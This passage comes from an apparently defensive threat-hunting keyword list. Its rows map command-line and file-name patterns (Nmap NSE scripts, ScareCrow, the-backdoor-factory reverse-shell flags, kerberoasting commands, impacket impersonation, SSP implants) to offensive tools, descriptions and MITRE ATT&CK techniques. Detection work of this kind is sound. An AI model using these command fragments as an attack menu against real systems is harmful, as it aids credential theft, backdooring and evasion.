Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2012-1823.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-0156.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-6786.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2013-7091.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2126.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2127.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2128.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-2129.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-3704.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2014-8877.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2015-1427.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2015-1635.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-1001000.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-5638.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-5689.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-cve2017-8917.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vulners-regex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/nmap-vulners,1,0,N/A,N/A,10,3002,526,2022-12-16T11:22:30Z,2017-12-19T21:21:28Z -* http-vuln-misfortune-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-vuln-wnr1000-creds.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-waf-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-waf-fingerprint.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-webdav-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-wordpress-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-xssed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -I *.bin * -Loader dll*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* -i havex.profile *,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,0,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -* -i snmp-ips.txt -c community.txt*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -* iax2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iax2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* icap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* -Identity * -Set @{serviceprincipalname='*'}*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting by setting SPN,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Identity * -XOR @{useraccountcontrol=4194304*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iec-identify.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -* ike-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -im amass -ir *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im get-dns-records*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im github-get-repositories*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im google-get-linkedIn-employees*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im 
grep-through-commits*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -im massdns*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* imaohw*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed whoami,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* imap-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* impacket *,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -* impacket*,offensive_tool_keyword,impacket,Impacket is 
a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* impacket*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* impacket.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* impacket/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --impersonate Administrator -shell *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -impersonate* -hashes*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -ImpersonateUser *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -* import Exrop*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -* -ImportDllPathPtr *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
